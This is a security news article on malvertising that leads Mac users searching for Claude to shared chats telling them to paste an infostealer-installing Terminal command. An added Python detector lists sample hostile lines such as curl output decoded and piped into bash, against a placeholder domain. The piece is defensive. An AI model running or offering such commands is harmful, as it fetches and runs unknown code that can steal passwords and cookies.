There’s currently a troubling trend where attackers are using Google Ads and real chats from Claude.ai to spread malware. If you search for “Claude mac download,” you might see sponsored links that seem to lead to the official site but actually guide you to install harmful software on your Mac.
This was brought to attention by security engineer Berk Albayrak, who posted his findings on LinkedIn. He discovered a Claude.ai shared chat that looks like an official guide for installing Claude on a Mac, supposedly from “Apple Support.” This chat instructs users to open Terminal and execute a command that downloads and runs malware without their knowledge.
An investigation by BleepingComputer found a second chat using a similar tactic. Both follow a familiar structure and approach, yet use different domains and methods to deliver malware. At the time of reporting, these dangerous chats were still publicly accessible.
What’s the Malware Doing?
The malware works by downloading an encoded shell script from various domains. This script is designed to run in memory, leaving minimal traces on the hard drive. BleepingComputer noted that the malware uses a technique called polymorphic delivery, changing its form each time to evade detection by security tools.
Once executed, the malware checks the system for specific keyboard settings related to Russian or CIS regions, and if found, it halts further actions. This raises concerns that the attackers are selectively targeting their victims. If the system passes this check, it collects data like the external IP, hostname, and operating system version before proceeding with malicious activities.
The script can also harvest sensitive information, including browser cookies and passwords stored in the macOS Keychain. Albayrak mentioned that one variant of the malware resembles the MacSync infostealer, indicating it’s a well-known threat.
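The delivery chain described above (a Terminal command that fetches an encoded shell script and runs it in memory) leaves a recognisable shape in command history and process logs. The following added example, not code from the article or from the researchers it cites, flags such lines with simple heuristics; the sample history and the example.invalid domain are constructed and are not the campaign's real commands.

```python
import re

# Indicators matching the delivery chain described in the article: a remote
# download, a decode step for an "encoded" script, and execution through an
# interpreter so that nothing is written to disk. Regexes are heuristics.
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
DECODER = re.compile(r"base64\s+(?:-d|-D|--decode)\b|openssl\s+enc\b.*\s-d\b|xxd\s+-r\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|k)?sh\b")
SUBST_TO_SHELL = re.compile(r"(?:\beval|\b(?:ba|z)?sh\s+-c)\s+[\"']?\$\(\s*(?:curl|wget)\b")
PROC_SUBST = re.compile(r"\b(?:ba|z)?sh\s+<\(\s*(?:curl|wget)\b")

def indicators(cmd):
    """Return the list of indicator names present in one shell command line."""
    found = []
    if DOWNLOADER.search(cmd):
        found.append("remote_download")
    if DECODER.search(cmd):
        found.append("decode_stage")
    if PIPE_TO_SHELL.search(cmd) or SUBST_TO_SHELL.search(cmd) or PROC_SUBST.search(cmd):
        found.append("in_memory_exec")
    return found

def is_suspicious(cmd):
    """Flag a line only when the download feeds an interpreter directly;
    a plain download or a plain pipe to sh on its own is not enough."""
    found = indicators(cmd)
    return "remote_download" in found and "in_memory_exec" in found

def scan(lines):
    """Scan command lines (e.g. a shell history export) and return
    (line_number, command, indicators) for every suspicious one."""
    return [(n, cmd, indicators(cmd))
            for n, cmd in enumerate(lines, 1) if is_suspicious(cmd)]

# Constructed sample history; not the campaign's real commands or domains.
SAMPLE_HISTORY = [
    "brew install --cask some-app",
    "curl -fsSL https://example.invalid/setup | base64 -d | bash",
    'bash -c "$(curl -fsSL https://example.invalid/install.sh)"',
    "curl -O https://example.invalid/file.zip",
    "echo hello | sh",
    "sh <(curl -s https://example.invalid/x)",
]

if __name__ == "__main__":
    for n, cmd, found in scan(SAMPLE_HISTORY):
        print(f"line {n}: {found} <- {cmd}")
```

Lines 2, 3 and 6 of the sample are flagged; the bare download on line 4 and the local pipe on line 5 are not, which keeps ordinary installer usage out of the alert.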
Legitimacy Can Be Deceptive
Malvertising, or malicious advertising, has become a common strategy for malware distribution. In past instances, ads would lead users to fake sites. This campaign takes it a step further by pointing directly to Anthropic’s real domain, claude.ai, and hiding the malicious instructions inside a shared chat on a legitimate platform, so the URL itself gives no hint that anything is wrong.
This isn’t the first time AI platforms have been targeted. Similar campaigns affecting ChatGPT and Grok surfaced recently, emphasizing the need for users to proceed with caution. It’s always safer to visit official sites directly for downloads rather than clicking on ads.
To avoid falling victim to such attacks, it’s wise to be skeptical of any instructions asking you to input commands, even if they seem credible. Always refer to official documentation for guidance.
For further readings on security threats and how to stay protected, check out [BleepingComputer](https://www.bleepingcomputer.com). They provide ongoing updates about similar incidents and offer important tips for safeguarding your data.